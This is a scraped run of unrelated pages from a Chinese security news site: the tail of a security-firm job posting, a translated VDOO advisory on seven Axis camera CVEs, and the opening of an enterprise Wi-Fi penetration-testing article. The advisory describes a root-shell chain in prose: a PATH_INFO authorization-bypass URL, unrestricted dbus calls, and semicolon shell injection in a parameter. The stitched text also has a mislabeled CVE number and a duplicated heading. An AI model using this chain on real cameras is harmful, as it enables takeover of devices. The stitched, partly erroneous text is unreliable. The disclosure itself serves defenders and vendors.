1.能主动关注国内外最新安全攻防技术,并在自己擅长和兴趣的领域能够进行深入的学习、研究;

2.熟练掌握Windows、Linux、移动终端上的主流攻防手段、技术、工具等;

3.对Web安全、服务端安全、客户端安全、移动安全、无线安全、物联网安全等其中几项有了解和研究;

4.至少熟练一门编程语言的书写;

5.具备良好的团队沟通、协作能力、良好的职业道德。

二、安全工程师
岗位描述:

1.负责公司安全服务项目;

2.负责漏洞验证,以及编写漏洞Poc;

任职要求:

1.熟悉Java、python、C/C++的至少一种或多种编程语言和开发环境以及常用框架类库;

2.熟悉常见的web、移动App、系统安全漏洞原理、检测方法以及修复方案;

3.具备良好的团队沟通、协作能力、良好的职业道德;

4.有安服或等保项目经验的优先。

三、安全售前工程师
岗位职责:

1.协助公司销售人员完成安全产品&服务项目的售前技术支持工作;

2.根据客户需求设计解决方案,按照文档规范整理编写技术支持文档,为相关人员提供公司安全产品、安全服务等业务讲解;

3.负责完成安全产品&服务项目的招投标工作,包括标书设计、投标应答、讲解与答疑;

4.跟踪最新行业领域技术相关知识,对于重点行业客户信息安全技术体系进行深入了解;为内部销售人员进行技术培训。

任职要求:

1.具有三年以上安全项目售前技术支持经验;

2.熟悉安全产品与服务业务(安全威胁管理、安全运营、漏洞扫描、渗透测试、风险评估、代码审计、应急响应等);

3.具有良好的客户服务观念、工作责任心及团队合作精神;

4.具有较强的演讲能力和写作能力(WORD、EXCEL、PPT);

5、对云计算、大数据有一定了解,具备一定的解决方案售前能力;

6.了解网络攻击、黑客攻防等安全技术;了解国内外网络、安全界发展现状。

优先考虑的条件:

1.具有CISSP、CISP、CISA、27001、PMP、COBIT、ITIL等安全认证者优先;

2.具有安全服务项目实施经验者优先。

四、企业安全产品经理
岗位要求:

1、3年以上企业安全产品经验,对于用户体验有深刻的理解,能够很好的规划和设计产品功能、使用流程与交互体验;

2、有CMDB、网管软件、资产管理经验优先;

3、有网络信息安全行业背景,特别是安全威胁监测、安全运营、威胁情报、漏洞管理等经验的优先。

五、JAVA开发工程师
职位描述:

1、开发基于Java的前、后台Web应用;

2、负责所承担模块的设计,开发,单元测试和文档编写。

职位要求:

1、计算机专业或相关领域专科学历(及以上);

2、3年以上java开发工作经验;

3、精通Java开发和常见的框架、平台;

4、熟练使用Eclipse、IntelliJ IDEA,SVN,JIRA,Git等开发相关工具;

5、熟练使用MySQL,SQLite,MongoDB,Redis等数据库系统;

6、熟悉jQuery、Bootstrap等流行的前端库;

7、熟悉常用类库,熟练调试;

8、有应用架构设计、优化、CMDB和网管软件等经验者优先,有前端切图经验者优先。

六、安全运营服务工程师
岗位职责:
1.负责面向用户的增值运营服务交付工作,包括平台的初始配置和优化维护、日常监测分析、安全预警、运营报告编写等工作
2.负责项目售后服务交付工作,包括平台巡检、产品培训、技术培训等工作
3.负责配合前端销售部门做好客户试用阶段的产品测试工作,编写测试报告
4.负责与实验室协调配合,共同完成面向客户的应急响应服务
5.其他与安全运营服务交付的相关工作

任职要求:
1.信息安全、计算机科学与技术、网络与通信、应用软件等相关专业全日制本科以上学历,1年以上服务运营相关工作经验
2.熟悉安全威胁情报、安全漏洞和风险管理、信息资产管理等相关知识,有一定的技术基础
3.具备一定的安全分析能力,能够根据原始安全监测数据给出客观的评价和安全建议
4.责任心、执行力、沟通能力强、团队合作意识强,能够承受一定工作压力;
5.有信息安全行业相关认证者优先,如CISP、CISSP等;

联系方式
简历投递邮箱:hr@shuziguanxing.com(请注明来自安全客)

薪资福利
12-17个月薪、奖金提成、七险一金(五险一金+员工补充医疗+子女医疗)、通信/交通/电脑补贴、年度体检、公司与部门团建活动、国内外旅游、员工内外部培训、图书、零食水果、节假日福利等等。

这里不仅有一群小伙伴等着你在球场上挥洒汗水,更有一群妹子等着你晚上吃鸡哦~Winner winner chicken dinner!赶快加入我们的团队吧,和大牛共事,一起比肩努力的提高机会。

安全招聘发布请联系安全客 duping@360.cn

商务合作,文章发布请联系 dengjinling@360.cn
招聘 数字观星

数字观星 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
教主
换一个
|评论列表
Ping溢出大神 · 2018-01-29 10:44:36 回复
一群妹子等着你晚上吃鸡。。。就我一个人邪恶了吗?

Dir溢出大神 · 2018-01-28 18:10:10 回复
你们和360的观星实验室是一个吗

数字观星 · 本文作者 · 2018-01-28 21:46:00 回复
不是啊大佬,我们不是一回事~ 我们公司前年2016年9月注册成立 360的观星实验室是去年才成立的 ( ̄▽ ̄)”

数字观星
北京数字观星科技有限公司
文章
1
粉丝
0
TA的文章
数字观星招聘安全人才,五倍年终奖加七险一金
2018-01-25 18:11:28
输入关键字搜索内容
相关文章
360企业安全集团 | 招募安全人才
北京 | 补天平台招人啦!
百度云安全岗位新年招聘啦~
中通快递诚招各类安全人才(10K-50K)
360代码卫士协助以太坊公链修复多个远程 DoS漏洞,想要加入我们吗?
陌陌招聘 | 两大安全负责人岗位,只等你来!
威胁猎人招聘 | 我们寻找神一般的新伙伴
热门推荐
文章目录
公司介绍
工作地点
招聘岗位
一、安全研究员
二、安全工程师
三、安全售前工程师
四、企业安全产品经理
五、JAVA开发工程师
六、安全运营服务工程师
联系方式
薪资福利
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

vdoo

vdoo
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
VDOO 披露 Axis 摄像头多个漏洞
阅读量 31126 | 稿费 200

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-07-02 15:00:59
译文声明
本文是翻译文章,文章原作者,文章来源:blog.vdoo.com
原文地址:https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/

译文仅供参考,具体内容表达以及含义原文为准

×

在过去的几个月里,VDOO 安全研究团队一直在物联网安防领域进行广泛的安全研究。在大多数情况下,为了提高效率和透明度,研究是和设备供应商一起进行的。

作为研究的一部分,VDOO 研究团队在多个供应商的设备中发现了 0day 漏洞。根据漏洞披露原则,这些漏洞首先向厂商披露,随后会逐步公开。

我们发现来自 Axis 的摄像头是最容易受到攻击的设备之一。我们团队在 Axis 安全摄像头中发现了一个关键漏洞链。攻击者在获得 ip 地址后利用这些漏洞能够远程控制这些摄像头(通过LAN 或者 互联网)。总的来说,VDOO 向 Axis 安全团队公开了 7 个漏洞。

这些漏洞的 CVE编号分别是: CVE-2018-10658, CVE-2018-10659, CVE-2018-10660, CVE-2018-10661, CVE-2018-10662, CVE-2018-10663 以及 CVE-2018-10664。

将报告中 3 个漏洞结合,未授权用户只要能够访问到登录页面,就能够完全控制这些受影响的摄像头。攻击者可以执行的操作有:

访问摄像头视频流
冻结摄像头视频流
控制摄像头 – 将镜头移动到需要的位置,开启/关闭 运动检测
将此摄像头纳入僵尸网络中
替换摄像头的软件
使用摄像头作为网络的渗透点(进行横向移动)
渲染无用的摄像头
使用摄像头执行其他恶意的任务(如 DDOS 攻击,挖矿等)
390 多个型号的摄像头受到这些漏洞影响。受影响设备清单在这里可以找到。Axis 使用 AC-128401 来标识我们发现的这些漏洞。

据我们所知,这些漏洞还没有被在野利用。因此,也就没有对 Axis 用户造成任何具体的隐私侵犯或安全威胁。

我们强烈推荐没有更新固件 Axis 用户立即更新固件或通过其他方法减低风险。请参阅下面 FAQ 部分的说明。

我们也推荐其他摄像头供应商遵循文末我们的推荐来避免和缓和类似的漏洞。

关于 VDOO
VDOO 是一个家致力于改变无保护联网设备现状的技术驱动公司。VDOO 正在构建一系列产品,以支持制造商在开发阶段将安全性嵌入到他们的联网设备中,并支持开发后的安全。

除了开发产品和服务外,VDOO 还为联网设备广泛研究投入大量的精力。安全摄像头是本研究的一个重点领域。

VDOO 研究目标是提供知识和工具来降低风险,同时激励设备制造商在他们的产品中实现正确的安全性。我们在 VDOO 认为,适当地实现安全要点将极大地减少设备漏洞被利用的机会。

这是我们在安防领域的第二份报告。

第一份关于 Foscan 摄像头的报告,发布在这里。有关我们所采用的研究方法的更多细节,在这里可以找到。

技术概要
摄像头运行的是 Linux 系统,中间件采用了 Apache httpd,Axis 开发了专有模块。web 服务器根目录的文件访问由 Axis 自定义的授权代码控制,这段授权代码在模块 mod_authz_axisgroupfile.so 中。通过使用专有模块 mod_trax.so,web 服务器将某些请求转发给其他进程,这些请求使用 Apache 配置文件中的特殊指令(如TransferMine)来处理。例如,以 .shtm、.shtml、.srv 为后缀的文件请求会转发给 /bin/ssid 进程。ssid 进程以 root 权限运行,处理 .src 的文件与 .shtm 和 .shtml 的请求不同,只有已授权的用户才能请求 .srv 文件。系统的一些守护进程通信是通过使用 dbus 进程间通信机制来实现的。此外,摄像头中有一个专用系统来管理内部参数。进程 /bin/parhand(参数处理程序)负责存储、获取、更新参数。例如,当用户通过 web 界面设置一个参数是,相关的 CGI 脚本(param.cgi)将 set-parameter 请求转发给 parhand 进程,该进程验证访问权限,并将参数的值存储在相应的配置文件中。一些参数以 shell 变量赋值的格式保存在配置文件末尾,然后在一些服务的启动脚本中导入(执行)。另一个有趣的进程是 /usr/sbin/policykit_parhand,它提供了policykitparhand dbus-interface,还包括有设置 parhand-parameters 值的函数。

攻击者以特殊顺序利用最新发现的 7 个漏洞中的 3 个能够获取到 root 权限的 shell。

攻击流程如下:

第一步:攻击者使用授权绕过漏洞(CVE-2018-10661)。利用这个漏洞攻击者可以发送未授权 HTTP 请求·到 /bin/ssid 中的 .srv 功能(处理 .srv 请求)。在正常情况下,只有授权的用户才能访问该功能。
第二步:攻击者使用一个不受限制(CVE-2018-10662)的接口向设备总线发送任意 dbus 消息。这个接口可从 /bin/ssid 的 .srv 中获得。由于 /bin/ssid 以 root 权限运行,这些已授权的 dbus 消息将调用系统 dbus-services 接口(否则会受到严格的授权策略的约束)。攻击者选择发送 dbus 消息到这一类的 dbus-services 接口,例如 PoclicyKitParhand。它提供一个可以修改 parhand 参数的函数。现在攻击者具备了控制设备的 parhand 的参数值的能力了(见下一个漏洞)。
第三步:利用命令执行漏洞(CVE-2018-10660)。一些参数以 shell 变量(“Shell-Mounted”)赋值的格式保存在配置文件末尾,然后在一些服务的启动脚本中以 root 权限执行。正是由于第二步,攻击者才可以发送未授权的请求来设置参数 parhand 的值。通过这样做,攻击者使用带有特殊字符的参数值触发命令注入漏洞,并 root 权限执行命令。

技术深究
本节提供了整个攻击流程中的每个漏洞的细节。

CVE-2018-10661 —— 认证旁路漏洞
此漏洞允许攻击者发送未通过身份验证的请求到 /bin/ssid 的 .srv 功能来绕过 web 服务器的授权机制,而无需提供用户凭证。

漏洞出现在供应商编写的 Apache httpd 授权模块 mod_authz_axisgroupfile.so。

正如上文提到的,摄像头使用的是 Apache httpd 服务器,以及访问 web 根目录以内的文件需要得到 mod_authz_axisgroupfile.so 授权模块授权。

文件根目录下只有唯一一个 .srv 文件 /sm/sm.srv(相对路径)。授权代码用于验证经过身份验证的用户是否有足够的权限才能通过。在获得授权后,web 服务器被配置为使用特定程序处理以 .srv 拓展(.srv 处理代码)结束的路径请求。

问题总结,在发送请求时,如果后面接上反斜杠并以 .srv 后缀(例如 http://CAMERA_IP/index.html/a.srv ),那么授权程序会认为是向 index.html 发送的标准请求,因此获得授权许可。而请求也会被视为对 .srv 路径的合法请求,因此会被 .srv 处理程序同时处理。

这是由于 web 服务器的一个特性,web 服务器处理跟随在实际的文件名后面的路径字符串(称为 PATH_INFO)。https://tools.ietf.org/html/rfc3875#section-4.1.5

当收到 http://CAMERA_IP/index.html/a.srv 的 HTTP 请求时,会出现以下(抽象的)逻辑。

当 Apache httpd 解析 URI 请求时,他在请求的 request_rec 结构体中设置以下成员字段。
uri = “/index.html/a.srv”
filename = “/usr/html/index.html” # 假设 web 根目录是 /usr/html
path_info = “/a.srv”
2.对 web 根目录下的文件访问由 Axis 自定义的授权代码 so 模块控制(由于 httpd 配置文件中的 /usr/html 目录指令中需要 axis-group-file 指令)。

自定义的权限代码执行授权验证仅基于 request.filename,会忽略 path_info 特性的存在,因此授予 /index.html/a.srv 的访问权限。应为请求被认为是针对可读文件 /usr/html/index.html(不需要任何身份验证)。

3.既然请求获得了授权,那么配置的 指令与 URI(我们请求的完整 uri,见上文)进行正则匹配。因为通过正则表达式匹配到的 URI 都是以 .srv 结尾,因此调用 .srv 处理代码 – “TransferMime /var/run/ssid/ssidsocket” 处理。它的功能是将请求传输到 /var/run/ssid/ssidsocket unix 套接字,以便 /bin/ssid 进程处理。

4.随后,/bin/ssid 进程接收到这个请求检查其(完整的)URI,并将请求视为对 .srv 文件的合法请求 —— 允许请求到达 .srv 功能。

在 mod_authz_axisgroupfile.so 模块中 axis_group_file_provider 函数的 IDA 截图可以看到,它被注册(通过 ap_register_auth_provider 函数)为路径(受到 Require axis-group-file 指令限制的路径)授权提供程序。在截图的上部可以看到, request.filename 用于检查文件是否可以被读取。在我们上面例子中,request.filename 的可读文件路径为 /usr/html/index.html。接下来程序调用参数 group_name 为空的 check_user_authz_by_file_owner_gid 函数。 当 group_name 为空时,后面的函数会跳过所有授权检查并授予对请求的访问权。

因此,攻击者将获得对 /bin/ssid 的 .srv 功能的未授权访问。

POC

为了展示能够到达 /bin/ssid 的 .srv 功能,我们发送一个带有 return_page 参数的请求。这是用于 HTTP 重定向的一个特殊参数。 当参数值(字符串 “it_worked”)出现在响应中,我们就知道了我们已经到达了 /bin/ssid 的 .srv 功能。

CVE-2018-10662 —— .srv 功能用户不受限制的 dbus 访问
达到 /bin/ssid 的 .srv 功能的合法请求可以通过在请求的查询字符串中设置操作参数来选择其中的一个功能。其中的一个功能是 dbus,它允许用户以 root(/bin/ssid 进程的 uid 和 gid) 权限调用任何 dbus 请求,并且不会受到目的地或者内容的限制。由于是来自 root 进程的 dbus 请求 —— 被授权不受限制的访问许多 dbus 服务接口。之所以会这样,是因为旨在限制此类请求的授权机制 PliocyKit 被配置成为来自 root 的请求自动授予访问权。

查看 PolicyKit.conf 手册得知,/etc/PolicyKit/PolicyKit.conf 最初设置为 “yes” 意味着已授予权限。

虽然 /bin/ssid 中 的 dbus 接口仅用于从某些特定的启用了 dbus 的服务中获取特定值,但是它暴露了更广泛的功能,从而产生了安全后果。

例如,该接口允许用户控制设备 parhand 参数的任意值。可以通过发送 dbus 请求来调用 policykit_parhand 进程的 dbus-interface (PolicyKitParhand)函数来实现。这个接口提供了可由 root dbus-client 调用的 SetParameter 和 SynchParameter 方法。通过在执行 SynchParameter 后面的 SetParameter,用户可以设置任意的 parhand 参数值并应用更改。

POC

摄像头的 parhand 参数值 Image.I0.Overlay.Enabled 用来控制是否在视频上方显示图片。例如,我们利用这个漏洞把它的值从 “no” 改为 “yes”。

在存在此漏洞的摄像头上运行这些命令后,视频的左上方会叠加一张图片(默认是 Axis 的小标志)。可以登录到 web 界面查看:

CVE-2018-1066 —— shell 命令注入漏洞
需要有修改参数 parhand 的权限才能利用这个漏洞。这可以通过以下几步实现:

获得/拥有管理员权限(通过使用 cgi 接口)
在 upnp 守护进程中执行代码
找到其他方法来控制 parhand 参数 —— CVE-2018-10662 在直接调用 policykit_parhand 函数的示例中实现了这一点(见上文)。
parhand 参数处理程序负责获取、存储、更改设备的许多内部参数。当用户通过 web 界面设置参数时,相关的 CGI 脚本(param.cgi) 转发设置参数请求到二进制文件 parhand,它检查访问权限,并将参数值保存在相关的配置文件中。

一些参数用于提供 shell 脚本,并被定义为 shell 挂载(在 parhand 配置文件中 mount =“shell()”)。参数值由 parhand shell 解析器解析,它不清理特殊的 shell 字符,也不引用参数值。其中的一些参数(例如,我们使用的 Time.DEST.Enable)以 shell 赋值的格式(例如,FOO=Bar)保存在配置(例如,/etc/sysconfig/openntpd.conf)文件末尾。之后,shell 初始化脚本(例如,parhand-systemctl restart time-source.service),它们作为设置命令的结果运行,该命令在为参数应用新值时执行 —— 通过 sync 命令。

shell 脚本直接执行配置文件(目的是包含配置参数),并且通过使用分号(“;”)设置参数值,使我们能够以 root 权限注入任意命令。

这个漏洞的关键因素在于:

解析 shell 环境中输入值时缺乏过滤
设备使用了一个过时的方法,使用 shell 脚本去是设置参数并将它们以 shell 赋值的方式存贮在文件中,然后执行这些文件。
请注意这些参数不仅能够通过摄像头的 upnp 守护进程设置。如果攻击者恰巧有能力在 UPnP 守护进程中执行代码,也能利用这个漏洞来提升权限。

POC

在可能的选择之外,我们选择使用需要管理员凭证的 param.cgi 接口来触发这个漏洞。我们注入 id 命令,它可以通过标准输出打印出当前用户的用户和组信息。在我们的示例中,标准输出被重定向到了系统日志。

POC 的验证效果 —— 执行这些命令之后,我们以管理员权限登录摄像头的接口查看系统日志(http://CAMERA_IP/axis-cgi/admin/systemlog.cgi),我能够在其中看到 id 命令的输出(末行的 uid 和 gid)。

其他漏洞
这一节中介绍的是在上面攻击中没有使用到的四个漏洞的细节。

CVE-2018-10664 —— 使 httpd 进程崩溃
这个漏洞允许未授权的攻击者击崩 httpd 进程 —— 导致(至少)使用默认配置的用户通过 web 界面查看到的视频界面为黑屏状态。

在触发这个漏洞后,系统日志会出现以下一行(接下来是崩溃转储)。

[ ERR ] kernel: [ 2819.017996] httpd: httpd: potentially unexpected fatal signal 11.
POC

这个漏洞通过向 .cgi 脚本 URL 发送带有 PATH_INFO 参数并以 .srv 拓展结束的 HTTP 请求触发。

CVE-2018-10663 —— /bin/ssid 进程信息泄露漏洞
这个漏洞不需要任何用户凭证。用户控制着在 /bin/ssid 的 .srv 功能中的查询字符 return_page 和 servermanager_return_page。当在响应构建代码处理时 —— 这些字段的值被缩减为 0x200 字节,并通过使用安全的 __snprintf_chk 函数复制到已分配的 0x200 字节的空间。然后 __snprintf_chk 函数的返回值(假设它们的长度)保存在结构体成员变量中,以便以后计算响应的内容长度。

__snprintf_chk 的返回值保存在结构体成员变量的 IDA 截图(部分)

_snprint_chk 函数的返回值的问题在于,“The number of characters that would have been written if n had been sufficiently large…”(摘自 sprintf 的手册)。这导致计算出来的内容的长度大于实际数据的大小,因此,内存中额外的字节会泄露在响应中。

POC

仔细观察返回值末尾的变化。额外的符号和字符是泄漏的字节,这些字节与内存中的响应缓冲区相邻。

CVE-2018-10658 —— 使 /bin/ssid 进程崩溃
这个漏洞不需要任何用户凭证。未认证的用户能够发送带有特殊的字符 dbus 请求致使 ssid 服务崩溃。崩溃源于 libbus-send.so 共享对象或相似的代码中。它生成的日志如下:

[ INFO ] ssid[2334]: process 2334: arguments to dbus_message_new_method_call() were incorrect, assertion “iface == NULL || _dbus_check_is_valid_interface (iface)” failed in file ../../dbus-1.10.14/dbus/dbus-message.c line 1373.

程序崩溃同样出现在直接调用带有相似字符的 “/usr/bin/dbus-send“ 时。他可能还影响到包含这些代码其他进程。值得注意的是 /bin/ssid 进程将会重启。

POC

CVE-2018-10658 —— 使 /bin/ssid 进程崩溃
未授权用户可以发送(通过 /bin/ssid .srv 接口)特殊构造的命令,该命令将调用 UND undefined ARM 指令(MIPS 或者其他架构的摄像头可能也有类似的情况),这样导致进程崩溃。值得注意的是 /bin/ssid 进程将会重启。

在触发这个漏洞以后会出现以下的日志:

[ ERR ] kernel: [ 2390.374778] ssid: ssid: potentially unexpected fatal signal 11.
这个漏洞不需要任何的用户凭证。

POC

给设备制造商的建议
我们想谈谈在本研究中分析的摄像机中发现的一些糟糕的架构,它们使得攻击者更容易发现和利用漏洞。我们鼓励设备制造商考虑以下建议。

缺乏特权分离: 这违反了特权分离的概念(https://en.wikipedia.org/wiki/Privilege_separation),它规定程序应该被分成若干部分 —— 每个部分都限制在它自己需要的特权中。虽然系统中的每个进程都作为 rot 权限运行 —— 任何系统进程中的代码执行漏洞都将导致攻击者提升到 root 权限。另一方面,如果使用高权限的程序越少,攻击者将不得不在一组受限制的进程中发现漏洞,以升级特权。这是一项更困难的任务。
例如,在CVE-2018-10662 中 /bin/ssid 有一个不受限制的 dbus 接口 —— 这将允许攻击者调用 dbus 服务函数。如果这个进程没有以 root 权限运行,那么 dbus 授权策略将不允许调用许多 dbus 特权服务函数。但是正由于 /bin/ssid 以 root 权限运行,所有的 dbus 函数都在没有授权限制的情况下暴露给了攻击者。
缺乏适当的输入过滤: 当从外部接口接收输入时,输入应该过滤掉具有潜在威胁的字符。这可以阻止 CVE-2018-10660 —— shell 的特殊字符不会被绕过。
最小化 shell 脚本的使用: 不鼓励将用户输入的参数作为 shell 脚本使用。这将导致 CVE-2018-10660。另外一个需要注意的 —— 替代直接执行 dbus 命令 —— 可以使用 parhand 结构(结合 dbus 和 getters 命令)。
缺乏二进制固件加密: 固件加密会让安全上一个台阶,攻击者更难分析出固件中的漏洞,特别是使用二进制 diffing 方法比较最新的和以前的固件发现和分析补丁 —— 通过这种方法,发现之前版本存在的漏洞。此外,设备包含带有函数名等符号的二进制。这有助与理解代码是如何运行的。另一方面,值得注意的是如果对固件内容采用 隐藏式安全, 固件被正确的加密,那么找到并修复漏洞就变得不那么容易。供应商应该仔细权衡这个问题。

感谢
我们要感谢 Axis 安全团队高效、及时地处理这些安全问题,以及他们专业的沟通能力。

荣誉
Or Peles (@peles_o), VDOO

FAQ 部分
Q1. 我如何知道我的设备是否易受到攻击?
为了验证你的设备是否存在这些漏洞 —— 你需要检查 ACV-128401 受影响设备列表。如果摄像头的固件版本低于 ACV-128401 受影响设备列表中公布的版本,那么你的设备是存在漏洞的。我们强烈建议立即更新固件。去检查你正在使用的设备的固件版本,你可以按照以下几步:

使用浏览器访问摄像头。
输入用户名和密码。
点击 “System” -> “Option” -> “Support” -> “System Overview”。
查看固件版本。
如果你有多个设备,那么使用 Axis 设备管理器软件或通过 Axis VAPIX API 以编程方式获取固件版本可能更值得(请参阅 VAPIX 官方文档中的 2.2 节)。

Q2. 如何判断的设备是否已遭受攻击?
你的设备被攻破的几率非常低,因为在发布的时候没有已知的恶意软件利用这些漏洞。
由于物联网恶意软件通常被精心设计以不被发现,所以没有简单的方法可以确定。任何对设备的可疑更改都可能表明您的设备上存在僵尸网络恶意软件。

几种检查的方法:

你的密码是否可用(不是应为你忘记了密码) —— 这是你的设备已经被接管的强烈信号。
你设备的设置被修改 —— 例如,视频被发送到了另外一个服务器。
网络流量激增 —— 如果可能的话,检查路由器网络统计信息。僵尸网络会增加来自摄像头的网络流量。任何流量尖峰都应该提醒你,因为除非你从摄像头上观看视频,否则这个数值应该相对较低。
Q3. 如果已经被攻击,那么有什么建议吗?
在发布时,我们没有发现任何恶意软件滥用这些漏洞。如果您怀疑您的摄像头被攻破,请将摄像头恢复到出厂设置。这样做会将配置恢复到默认设置,允许您连接和升级固件。请记住,如果您使用的固件易受 VDOO 检测到的漏洞的影响,那么该设备可能会成为被攻击的目标,并可能很快再次受到感染。因此,在重新设置设备后,请确保在把摄像头直连到互联网之前执行固件升级。

Q4. 如果我不能更新相机的固件,如何降低风险?
为了减少摄像头远程管理能力被暴露,建议将设备放置在防火墙屏蔽端口 80 和 443 (或摄像头配置中指定的端口)的后面,并且不允许摄像头启动任何出站连接。另一种选择是将设备放在反向代理的后面,该代理阻止我们用于漏洞利用的 URLs (详细信息见上文)。如果需要其他帮助,请联系security@vdoo.com。

Q5. 如何更新摄像头的固件?
升级到最新固件,你可以使用 Axis 设备管理器,摄像头的 web 界面或者 FTP。在 https://www.axis.com/en-in/support/tecnical-notes/how-to-upgrade 页面查看厂商关于固件更新的说明。

原文:VDOO Discovers Significant Vulnerabilities in Axis Cameras

审核人:yiwang 编辑:少爷

本文翻译自 blog.vdoo.com, 原文链接 。如若转载请注明出处。
漏洞 IoT 技术分析 Axis 摄像头

桥的断想 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
吃瓜群众
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
桥的断想
这个人太懒了,签名都懒得写一个
文章
3
粉丝
0
TA的文章
低功耗蓝牙攻击实用指南
2018-12-19 16:30:15
VDOO 披露 Axis 摄像头多个漏洞
2018-07-02 15:00:59
Hacking 智能手环
2018-06-05 12:02:17
输入关键字搜索内容
相关文章
悬赏50万!小米智能生活安全守护计划启动
基于Web攻击的方式发现并攻击物联网设备
2018 年 IoT 那些事儿
叮叮当 | 辞旧迎新,愿老铁平安喜乐
活动 | MTSRC 强势召唤赏金猎人!年终大奖等你来拿!
垃圾邮件服务,声称可以在任何地方“打印”任何东西
物联网安全学习笔记之二——小试牛刀
热门推荐
文章目录
关于 VDOO
技术概要
技术深究
CVE-2018-10661 —— 认证旁路漏洞
CVE-2018-10662 —— .srv 功能用户不受限制的 dbus 访问
CVE-2018-1066 —— shell 命令注入漏洞
其他漏洞
CVE-2018-10664 —— 使 httpd 进程崩溃
CVE-2018-10663 —— /bin/ssid 进程信息泄露漏洞
CVE-2018-10658 —— 使 /bin/ssid 进程崩溃
CVE-2018-10658 —— 使 /bin/ssid 进程崩溃
给设备制造商的建议
感谢
荣誉
FAQ 部分
Q1. 我如何知道我的设备是否易受到攻击?
Q2. 如何判断的设备是否已遭受攻击?
Q3. 如果已经被攻击,那么有什么建议吗?
Q4. 如果我不能更新相机的固件,如何降低风险?
Q5. 如何更新摄像头的固件?
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

企业无线

企业无线
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
一二三四五,企业无线渗透说清楚
阅读量 102237 | 评论 3 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-09-03 15:29:13

1.企业无线安全概述
在无线网络快速发展过程中,很大一部分企业并没有对无线网络的安全给予足够的重视,只是随着对无线网络需求的出现,逐步组建起了无线网络。目前,无线网络事实上已经成为了企业移动化办公的重要基础设施,但由于普遍缺乏有效的管理,部署与使用人员的安全意识和专业知识的不足,导致AP分布混乱,设备安全性脆弱,无线网络也越来越多的成为黑客入侵企业内网系统的突破口,由此给企业带来新的安全威胁。

比如近年来由无线网络引发的多起企业安全事件:

– 2014年,某留学中介Wi-Fi安全导致数据库泄露;

– 2015年3月,由于某公司内部存在开放的Wi-Fi网络,导致超级计算机天河一号被入侵,大量敏感信息疑遭泄漏;

– 2015年5月,有用户在T1航站楼使用登机牌登录Wi-Fi网络时,发现由于机场Wi-Fi提供商的服务器安全设施不足和代码漏洞,可导致服务器中的用户隐私数据被泄漏及登机人信息被窃取;

– 2016年,某手机售后中心Wi-Fi安全导致内网漫游;

– 2017年,国内某航空公司Wi-Fi安全导致内网漫游。

企业无线热点类型
企业内部存在的热点大概可以分为这几类:

1. 企业自建热点
为了满足自身业务需要或方便员工网络访问需求,大部分企业都开始在内部组建无线网络。这种企业有规划的搭建的热点,称为合法热点。

2. 非企业自建热点
除企业自建热点外的所有热点,又可分为以下几类。

外部热点

由于无线网络的穿透性和边界不确定性,在某些邻近的企业,无线网络可能会互相覆盖,也就是说在A企业可能会找到B企业的热点,在B企业也可能会找到A企业的热点。

员工私建热点

如今随身Wi-Fi产品种类越来越多,使用越来越方便,只要插到有网络的电脑设备上即可分享一个跟此网络连通的无线网络;在自身有无线网卡的设备上还可以通过应用程序直接创建无线网络。

恶意热点

一些攻击者还可能会故意在企业周围建立恶意热点,采用与企业热点相同或类似的名称,使企业员工的终端在有意或者无意间尝试连接该热点。随后攻击者通过对热点中的流量进行分析或者通过钓鱼的方式,从而获取员工敏感信息,获取内网登录凭证,进而入侵企业内网。

综上所述,在企业内可能出现很多种热点,这些热点有企业内部合法建立的,也有因为其他原因客观存在于企业内部的私建热点等,各种热点都存在不同的安全隐患和问题。我们将在本文中了解针对企业级无线环境的渗透测试方式。

2. 802.1X热点
/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/81516708.png

802.1X 最初是为有线接入而设计,由于连接需要物理接触,并没有太多安全方面的考虑。而无线网络的出现使设备接入变得十分容易,因此需要对802.1X的安全性进行加强,即增强EAP协议的安全性。除了热点验证用户身份的需求外,用户也需要确保正在连接的热点是合法热点,也即双向认证的需求。基于 IETF 的 TLS 标准就可以较好的实现这两点需求,之后三种基于TLS的EAP协议就被研制了出来:EAP-TLS、EAP-TTLS、EAP-PEAP。

由于PEAP与Windows操作系统具有良好的协调性,其可以通过Windows组策略进行管理使得PEAP在部署时极其简单。同时,由于PEAP兼容几乎大部分厂商的设备,因此大多数企业在部署无线网络时一般都会选择采用PEAP-MSCHAP v2、AD认证(域账户)的架构。

PEAP通过类似SSL机制为认证提供传输层的安全,需要企业去向CA购买证书或者自建PKI系统来签署用于无线网络的证书,同时将根证书部署到每个客户端。“将根证书部署到每个客户端”这个要求显然是存在极大的运营成本,许多企业都选择直接忽视,而用户可能会面对未经认证的证书,如下图:

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/80787994.png
